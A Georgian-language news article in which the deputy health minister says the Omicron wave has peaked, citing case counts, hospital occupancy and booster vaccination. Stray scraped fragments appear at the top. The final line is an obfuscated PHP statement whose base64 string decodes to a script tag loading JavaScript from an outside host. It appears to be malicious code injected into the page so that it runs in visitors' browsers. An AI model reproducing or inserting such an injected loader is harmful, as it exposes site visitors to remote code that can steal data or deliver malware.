celsiusi
ავერსი შნაიდერი
„ომიკრონის“ ტალღის პიკი გადავლილია და ჩვენ მივდივართ დაღმასვლისკენ - შემდგომი სტაბილიზაციის მოლოდინი ნამდვილად გვაქვს და ამის შესაბამისად დაიგეგმება ჰოსპიტალური სექტორის დემობილიზაციის პროცესი, - ამის შესახებ ჯანდაცვის მინისტრის მოადგილემ თამარ გაბუნიამ უწყებათაშორისი საკოორდინაციო საბჭოს სხდომის დასრულების შემდეგ განაცხადა.
 
მისი თქმით, ქვეყანაში დადებითობის მაჩვენებელიც იკლებს, რაც იმედისმომცემი ნიშანია.
 
ამასთან, გაბუნიამ აღნიშნა, რომ ვაქცინაციის პროგრამის წახალისებას დღესაც განსაკუთრებული მნიშვნელობა აქვს.
 
„დღეს 12 000-ზე ოდნავ მეტი შემთხვევა დაფიქსირდა, რაც ნიშნავს იმას, რომ „ომიკრონის“ ტალღის პიკი გადავლილია და ჩვენ მივდივართ დაღმასვლისკენ. კლინიკურ სექტორში 8000-ზე მეტი საწოლია მობილიზებული და აქაც იკლებს პაციენტების რაოდენობა, 5164 პაციენტი მკურნალობს დღევანდელი მდგომარეობით, 1200-ზე ოდნავ მეტი პაციენტია ინტენსიური თერაპიის განყოფილებაში, 289 პაციენტი არის რეანიმაციულ განყოფილებაში. ამ დროისთვის თავისუფალია საწოლფონდის 36%-მდე.
 
გრძელდება ვაქცინაციის პროგრამა შედარებით ნაკლები ტემპით, მაგრამ გუშინ ოდნავ მაღალი იყო ვაქცინაციის მაჩვენებელი, „ბუსტერ" დოზები რჩება კვლავაც პირველადი მნიშვნელობის და დღესაც განსაკუთრებული მნიშვნელობა აქვს ვაქცინაციის პროგრამის წახალისებას.
 
დადებითობის მაჩვენებელიც იკლებს, რაც არის იმედისმომცემი ნიშანი. შემდგომი სტაბილიზაციის მოლოდინი ნამდვილად გვაქვს და ამის შესაბამისად, დაიგეგმება უკვე ჰოსპიტალური სექტორის დემობილიზაციის პროცესი, იმგვარად, რომ ყველას ჰქონდეს ჰოსპიტალში მკურნალობის შესაძლებლობა, ვისაც ეს სჭირდება. სრულად მობილიზებული რჩება პირველადი ჯანდაცვის ქსელი - 193 პირველადი ჯანდაცვის დაწესებულება მუშაობს უკვე ბინაზე კონსულტაციების მოდელში, რაც არის იმის გარანტია, რომ ყველა ვინც ბინაზე რჩება და მკურნალობს იყოს ოჯახის ექიმის მეთვალყურეობის ქვეშ და ჰქონდეს სწრაფი რეაგირება სიმპტომებზე“, - განაცხადა გაბუნიამ.
685
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");